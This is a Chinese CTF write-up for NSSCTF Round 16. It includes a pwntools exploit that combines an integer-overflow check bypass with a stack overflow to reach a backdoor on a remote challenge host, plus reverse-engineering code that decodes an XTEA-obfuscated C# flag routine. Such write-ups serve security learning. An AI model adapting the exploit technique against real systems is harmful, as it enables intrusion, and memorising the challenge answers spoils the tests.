跳转至

nssctfr16_wp

pwn

nc_pwnre

一个异或的逻辑, 异或后是一串base64编码,提交解码后的文本就进到shell了

1
2
3
4
a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d]

for i in a:
    print(chr(i ^ 0x10),end="")

1
TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ==

1705130191002

ret_text

1
2
 __isoc99_scanf("%d", &v2);
  if ( v2 < 0 && (v2 = -v2, v2 < 0) )

-2147483648 进行 - 运算后会溢出,满足这个if的约束,能走到下边read,read那有一个栈溢出,覆盖返回地址为backdoor就好了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./ret_text_v0')
libc = elf.libc

is_debug = 0

if(is_debug):
    p = process()
else:
    ip = "node7.anna.nssctf.cn"
    port = 28070
    p = remote(ip,port)

## gdb.attach(p)
g = lambda x: gdb.attach(x)

## send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)

## recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)

r_leek_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leek_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])



payload = "-2147483648"

sla("Easy ret2text!!!Input:\n",payload)

payload = b'a' * (0x20 + 0x4) + p32(0x8049328)

sla("OK!!!You are right.\n",payload)

p.interactive()

re

test your Debugger

打个断点去内存里面看一下flag就好了

CompileMe!!!

一眼 xtea,尝试编译了一下发现爆内存 vs崩溃了,有一个new ZZZ()的操作跟了一下,发现爆内存的原因是调用栈 栈帧太多了,写一个class zzz,然后再写一个getval的方法,直接把val计算出来就好了。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
    internal class Program
    {
        static void Main(string[] args)
        {
            var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
            var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
            const ulong ___ = 0x9E3779B9;
            var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();

            var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
                .GroupBy(____________ => ____________.Index / 2)
                .Select(___________ =>
                {
                    ulong _________ = ___________.ElementAt(0).Value;
                    ulong __________ = ___________.ElementAt(1).Value;
                    ulong _____________ = ___ * 32;

                    ____.ToList().ForEach(_____________________ =>
                    {
                        __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
                        _____________ -= ___;
                        _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
                    });
                    return new[] { _________, __________ };
                })
                .SelectMany(______________ => ______________)
                .ToArray();

            Array.Copy(_____, __, __.Length);

            __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
            //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
            //Try to compile me!!!
        }
    }

一些文本处理的代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
## import re

## code = """
## //NET8.0
## 
# 
## namespace NSSCTF
## {
##     internal class Program
##     {
##         static void Main(string[] args)
##         {
##             var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
##             var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
##             const ulong ___ = 0x9E3779B9;
##             var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();
## 
#             var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
##                 .GroupBy(____________ => ____________.Index / 2)
##                 .Select(___________ =>
##                 {
##                     ulong _________ = ___________.ElementAt(0).Value;
##                     ulong __________ = ___________.ElementAt(1).Value;
##                     ulong _____________ = ___ * 32;
## 
#                     ____.ToList().ForEach(_____________________ =>
##                     {
##                         __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
##                         _____________ -= ___;
##                         _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
##                     });
##                     return new[] { _________, __________ };
##                 })
##                 .SelectMany(______________ => ______________)
##                 .ToArray();
## 
#             Array.Copy(_____, __, __.Length);
## 
#             __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
##             //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
##             //Try to compile me!!!
##                .......
##         }
##     }
## 
#     abstract class _(ulong val)
##     {
##         public abstract ulong GetVal();
##     }
## 
#     class A(ulong val) : _(val)
##     {
##         public override ulong GetVal()
##         {
##             return val + 0x79013C0BD7467DC;
##         }
##     }
## 
#     class B(ulong val) : A(val)
##     {
##         public override ulong GetVal()
##         {
##             base.GetVal();
##             return val - 0x78D23D50E23FC98;
##         }
##     }
## 
#     class C(ulong val) : B(val)
##     {
## """
## regex = r"return\s+val\s+([+-^])\s+(0x[a-fA-F0-9]+);"

## matches = re.findall(regex, code)
## 
# for i in matches:
##     print(i)
## 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
## data = """
## + 0x79013C0BD7467DC
## - 0x78D23D50E23FC98
## ^ 0x7E83D35728928CB
## - 0x4901E49CF9D63E8
## ^ 0x664DCA766EBA177
## + 0x7532EA705E8D596
## - 0x703A7337269BDED
## ^ 0x6FD783765C32290
## - 0x5A443D7480A09F7
## 
#...... 
## """
## 
# processed_data = ""
## for line in data.strip().split('\n'):
##     operator, number = line.split(' ')
##     processed_line = f"value {operator}= {number};\n"
##     print("            " + processed_line)

执行后得到flag

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
using System.Reflection.Metadata.Ecma335;
using System.Text;
namespace NSSCTF
{
    internal class Program
    {
        static void Main(string[] args)
        {
            var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
            var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
            const ulong ___ = 0x9E3779B9;
            var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();

            var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
                .GroupBy(____________ => ____________.Index / 2)
                .Select(___________ =>
                {
                    ulong _________ = ___________.ElementAt(0).Value;
                    ulong __________ = ___________.ElementAt(1).Value;
                    ulong _____________ = ___ * 32;

                    ____.ToList().ForEach(_____________________ =>
                    {
                        __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
                        _____________ -= ___;
                        _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
                    });
                    return new[] { _________, __________ };
                })
                .SelectMany(______________ => ______________)
                .ToArray();

            Array.Copy(_____, __, __.Length);

            __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
            //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
            //Try to compile me!!!
        }
    }
    class ZZZ(ulong val)
    {
        ulong value = val;
        public ulong GetVal()
        {
            value += 0x79013C0BD7467DC;

            value -= 0x78D23D50E23FC98;

            value ^= 0x7E83D35728928CB;

            value -= 0x4901E49CF9D63E8;

            value ^= 0x664DCA766EBA177;

            value += 0x7532EA705E8D596;

            value -= 0x703A7337269BDED;
            ......
        }
    }
}